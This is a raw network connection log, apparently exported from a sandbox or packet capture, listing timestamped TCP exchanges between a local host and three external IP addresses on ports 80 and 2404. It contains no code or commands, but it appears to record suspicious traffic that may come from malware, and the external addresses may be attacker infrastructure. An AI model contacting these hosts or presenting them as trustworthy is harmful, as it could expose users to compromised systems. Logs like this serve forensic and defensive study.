                                                                              Dec 6, 2024 09:59:38.242285013 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.242331028 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.242377043 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.243097067 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.243175983 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.243201971 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.243244886 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.243963957 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.244056940 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:39.855850935 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:39.975758076 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:39.976021051 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:39.989310980 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:40.109066963 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.123814106 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.166076899 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:41.356694937 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.368386984 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:41.488318920 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.488537073 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:41.608381987 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.834870100 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:41.836816072 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:41.956739902 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:42.033025980 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:42.035099983 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:42.062439919 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:42.062592030 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:42.088027000 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:42.155174971 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:42.155385971 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:42.159904957 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:42.191402912 CET4981980192.168.2.5178.237.33.50
                                                                              Dec 6, 2024 09:59:42.280539989 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:42.312402010 CET8049819178.237.33.50192.168.2.5
                                                                              Dec 6, 2024 09:59:42.312501907 CET4981980192.168.2.5178.237.33.50
                                                                              Dec 6, 2024 09:59:42.312772989 CET4981980192.168.2.5178.237.33.50
                                                                              Dec 6, 2024 09:59:42.432593107 CET8049819178.237.33.50192.168.2.5
                                                                              Dec 6, 2024 09:59:43.318264961 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:43.369221926 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:43.555100918 CET8049819178.237.33.50192.168.2.5
                                                                              Dec 6, 2024 09:59:43.555356979 CET4981980192.168.2.5178.237.33.50
                                                                              Dec 6, 2024 09:59:43.556618929 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:43.560811043 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:43.571711063 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:43.680741072 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:43.680805922 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:43.691602945 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:43.800571918 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.037903070 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.037935019 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.037946939 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.038079023 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.038091898 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.038296938 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.038296938 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.076992035 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.077018023 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.077030897 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.077045918 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.077071905 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.077122927 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.085124016 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.085192919 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.085222006 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.093529940 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.093600035 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.230875969 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.230917931 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.230979919 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.235021114 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.235176086 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.235227108 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.243413925 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.243482113 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.243545055 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.251842022 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.251935005 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.251998901 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.260215044 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.260236025 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.260299921 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.268507957 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.268609047 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.268671036 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.274679899 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.274744034 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.274821043 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.283189058 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.286144018 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.286245108 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.286297083 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.294590950 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.294655085 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.294673920 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.302947998 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.303021908 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.303036928 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.311371088 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.311440945 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.311449051 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.350785971 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.350797892 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.351144075 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.422035933 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.422210932 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.422410965 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.425585985 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.425681114 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.425741911 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.432836056 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.432912111 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.432966948 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.439903975 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.440126896 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.440198898 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.446685076 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.446721077 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.446787119 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.453077078 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.453210115 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.453288078 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.459377050 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.459490061 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.459547043 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.465778112 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.465816975 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.465899944 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.472171068 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.472213030 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.472336054 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.478498936 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.478547096 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.478640079 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.485419035 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.485511065 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.485594988 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.488535881 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.488590956 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.488656998 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.492105961 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.492201090 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.492263079 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.495826960 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.495850086 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.495933056 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.499499083 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.499555111 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.499629974 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.503128052 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.503165007 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.503226995 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.506794930 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.506860971 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.506923914 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.510436058 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.510521889 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.510579109 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.514167070 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.514223099 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.514280081 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.517729044 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.517811060 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.517865896 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.521404028 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.521466970 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.521533012 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.525068998 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.525129080 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.525178909 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.542222023 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.542335033 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.542561054 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.544022083 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.544091940 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.544248104 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.555036068 CET8049819178.237.33.50192.168.2.5
                                                                              Dec 6, 2024 09:59:44.555207968 CET4981980192.168.2.5178.237.33.50
                                                                              Dec 6, 2024 09:59:44.613934040 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.613951921 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.614092112 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.615660906 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.616375923 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.616520882 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.616560936 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.620012999 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.620060921 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.620130062 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.623708010 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.623763084 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.623806000 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.627307892 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.627352953 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.627373934 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.630770922 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.630829096 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.630850077 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.634104967 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.634167910 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.634210110 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.637320042 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.637375116 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.637382030 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.640404940 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.640461922 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.640532017 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.652895927 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.653073072 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.653101921 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.654198885 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.654252052 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.654299021 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.657002926 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.657068968 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.657083035 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.659810066 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.659872055 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.659907103 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.662579060 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.662636042 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.662673950 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.665417910 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.665478945 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.665482998 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.668179035 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.668236017 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.668292046 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.670968056 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.671032906 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.671087980 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.672796965 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.672854900 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.672866106 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.674695969 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.674751997 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.674858093 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.676551104 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.676604033 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.676635981 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.678419113 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.678467989 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.678484917 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.680272102 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.680320978 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.680397987 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.682176113 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.682233095 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.682251930 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.684004068 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.684067011 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.684075117 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.685906887 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.685966015 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.685993910 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.687728882 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.687784910 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.687835932 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.689696074 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.689738989 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.689805984 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.691551924 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.691595078 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.691602945 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.693448067 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.693500996 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.693569899 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.695246935 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.695298910 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.695353985 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.697088957 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.697140932 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.697186947 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.698957920 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.699012995 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.699052095 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.700875044 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.700912952 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.700927973 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.702758074 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.702814102 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.702944994 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.704566002 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.704617023 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.704658031 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.706475019 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.706525087 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.706578016 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.708336115 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.708384037 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.708420992 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.710180044 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.710237026 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.710294962 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.712073088 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.712097883 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.712122917 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.759864092 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.805958033 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.806094885 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.806152105 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.806435108 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.806550026 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.806602955 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.808372974 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.808458090 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.808511972 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.810259104 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.810424089 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.810506105 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.812084913 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.812247038 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.812325954 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.813957930 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.814057112 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.814105988 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.815855980 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.815983057 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.816072941 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.817667961 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.817785978 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.817826986 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.819462061 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.819585085 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.819633007 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.821238995 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.821342945 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.821394920 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.822941065 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.823045969 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.823092937 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:44.824659109 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.824805975 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:44.824861050 CET498182404192.168.2.5162.251.122.87
